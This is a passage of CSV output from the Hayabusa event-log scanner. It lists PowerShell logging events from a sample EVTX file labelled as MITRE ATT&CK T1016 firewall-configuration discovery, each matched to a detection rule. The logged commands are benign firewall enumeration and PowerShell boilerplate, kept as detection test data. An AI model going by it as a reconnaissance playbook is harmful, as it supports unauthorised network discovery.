$false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.207 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultInboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['DefaultOutboundAction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowInboundRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowInboundRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalFirewallRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowLocalIPsecRules'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserApps'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserApps'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUserPorts'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUserPorts'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['AllowUnicastResponseToMulticast'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['NotifyOnListen'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['NotifyOnListen'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EnableStealthModeForIPsec'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$x = $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""]; if ($x -ne $null -and $x.Value -ne $null -and $x.Value.ToString().ToUpperInvariant().Equals(""4294967296"")) { ""NotConfigured""; } else { $x.Value }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) if ($x.ToUpperInvariant().Equals(""NOTCONFIGURED"")) { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = 4294967296; } else { $this.PSBase.CimInstanceProperties[""LogMaxSizeKilobytes""].Value = [uint32]$x; }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogAllowed'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogAllowed'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogBlocked'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogBlocked'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]($this.PSBase.CimInstanceProperties['LogIgnored'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.364 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['LogIgnored'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.473 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallProfile): ""Get-NetFirewallProfile"" ParameterBinding(Get-NetFirewallProfile): name=""Name""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetFirewallRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""AssociatedNetIPsecMainModeRule""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""CimSession""; value="""" ParameterBinding(Get-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallProfile): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Domain"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Private"")"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallProfile (InstanceID = ""MSFT?FW?FirewallProfile?Public"")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock
Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.489 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.223 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.239 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"$this.PSBase.CimInstanceProperties[""DisplayName""].Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param($x) ; $this.PSBase.CimInstanceProperties[""DisplayName""].Value = $x ; $this.PSBase.CimInstanceProperties[""ElementName""].Value = $x",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]($this.PSBase.CimInstanceProperties['Enabled'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Enabled'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]($this.PSBase.CimInstanceProperties['Profiles'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Profiles'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]($this.PSBase.CimInstanceProperties['Direction'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Direction'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]($this.PSBase.CimInstanceProperties['Action'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['Action'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]($this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['EdgeTraversalPolicy'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]($this.PSBase.CimInstanceProperties['PrimaryStatus'].Value + 0),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param($x); $this.PSBase.CimInstanceProperties['PrimaryStatus'].Value = [System.Uint16][Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus]$x,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:08.317 